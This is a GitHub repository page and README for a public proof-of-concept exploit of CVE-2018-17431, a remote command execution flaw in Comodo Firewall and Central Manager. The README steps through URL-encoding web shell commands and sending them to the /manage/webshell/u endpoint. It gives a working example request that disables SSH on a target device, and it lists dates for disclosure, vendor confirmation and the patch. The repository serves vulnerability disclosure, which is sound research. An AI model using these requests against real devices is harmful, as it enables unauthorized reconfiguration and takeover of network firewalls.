https://github.com/Fadavvi/CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431
https://github.com/Fadavvi/CVE-2018-17431-PoC

comodo cve cve-2018-17431 exploit poc proof-of-concept rce remote-code-execution

Last synced: 2 months ago
JSON representation

Proof of consept for CVE-2018-17431

• Host: GitHub
• URL: https://github.com/Fadavvi/CVE-2018-17431-PoC
• Owner: Fadavvi
• Created: 2018-12-08T07:47:41.000Z (over 6 years ago)
• Default Branch: master
• Last Pushed: 2021-06-10T12:36:31.000Z (almost 4 years ago)
• Last Synced: 2023-03-08T20:08:26.253Z (about 2 years ago)
• Topics: comodo, cve, cve-2018-17431, exploit, poc, proof-of-concept, rce, remote-code-execution
• Language: Python
• Homepage:
• Size: 558 KB
• Stars: 1
• Watchers: 0
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
## CVE-2018-17431-PoC

Proof of consept for CVE-2018-17431

### Exploit Title: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Command Execution (Web Shell based)

### Exploit Author: Milad Fadavvi

### Vendor Homepage: https://www.comodo.com/

### Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276

### Version: before 2.7.0 & 1.5.0

### Tested on: Windows:firefox/chrome - Kali:firefox

### Discovery Date: 2018-08-15 (reported in sameday)

### Confirmation than bug exist: 2018-09-22 ([Ticket ID: XWR-503-79437](https://github.com/Fadavvi/CVE-2018-17431-PoC/blob/master/Comodo-Confirmarion.png))

### Patch released: 2018-11-23 [Release Notes from Comodo](https://github.com/Fadavvi/CVE-2018-17431-PoC/raw/master/DomeFW2.7.0.ReleaseNote.pdf)

Exploit:

1. WebShell simulation:

        For example disable SSH in web shell is like this:

            - service [hit enter]

            - ssh [hit enter]

            - disable [hit enter]

2. Encode

        

        make above sequense encode with URL ECODING

        (I used burp encoder plugin)

        %73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a

3. Run 

        Base URL: https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152

        

        

                  https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152 (extra enter key for run the command)

                  

        Example: https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152

        

              https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152

A page with **"Configuration has been altered"** message will show up and configuration changed!

### With this technic, we can simulate all WebShell Commands.